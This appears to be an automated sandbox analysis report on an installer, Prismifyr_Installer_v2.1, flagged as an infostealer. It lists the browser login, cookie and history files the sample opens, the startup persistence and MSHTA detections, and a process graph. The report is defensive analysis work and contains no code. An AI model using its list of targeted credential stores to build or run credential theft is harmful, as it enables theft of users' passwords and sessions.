Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Vortex_Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Directory queried: C:\Users\user\Documents Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541090 Sample: Prismifyr_Installer_v2.1 Se... Startdate: 24/10/2024 Architecture: WINDOWS Score: 60 65 Sigma detected: MSHTA Suspicious Execution 01 2->65 67 Drops large PE files 2->67 8 Prismifyr_Installer_v2.1.exe 47 2->8         started        12 Prismifyr_Installer_v2.1 Setup 1.0.0.exe 12 238 2->12         started        14 Prismifyr_Installer_v2.1.exe 2->14         started        process3 file4 47 C:\Users\...\Prismifyr_Installer_v2.1.exe, PE32+ 8->47 dropped 49 C:\Users\user\AppData\Local\...\history.db, SQLite 8->49 dropped 51 C:\Users\user\AppData\Local\...\webdata.db, SQLite 8->51 dropped 59 11 other files (9 malicious) 8->59 dropped 69 Drops PE files to the startup folder 8->69 71 Tries to harvest and steal browser information (history, passwords, etc) 8->71 73 Drops large PE files 8->73 75 Detected generic credential text file 8->75 16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 cmd.exe 1 8->20         started        22 6 other processes 8->22 53 C:\Users\...\Prismifyr_Installer_v2.1.exe, PE32+ 12->53 dropped 55 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 12->55 dropped 57 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 12->57 dropped 61 15 other files (none is malicious) 12->61 dropped signatures5 process6 process7 24 csc.exe 16->24         started        39 2 other processes 16->39 27 cmd.exe 18->27         started        29 conhost.exe 18->29         started        31 conhost.exe 20->31         started        33 tasklist.exe 20->33         started        35 conhost.exe 22->35         started        37 tasklist.exe 22->37         started        41 6 other processes 22->41 file8 63 C:\Users\user\...\screenCapture_1.3.2.exe, PE32 24->63 dropped 43 cvtres.exe 24->43         started        45 mshta.exe 27->45         started        process9
No contacted IP infos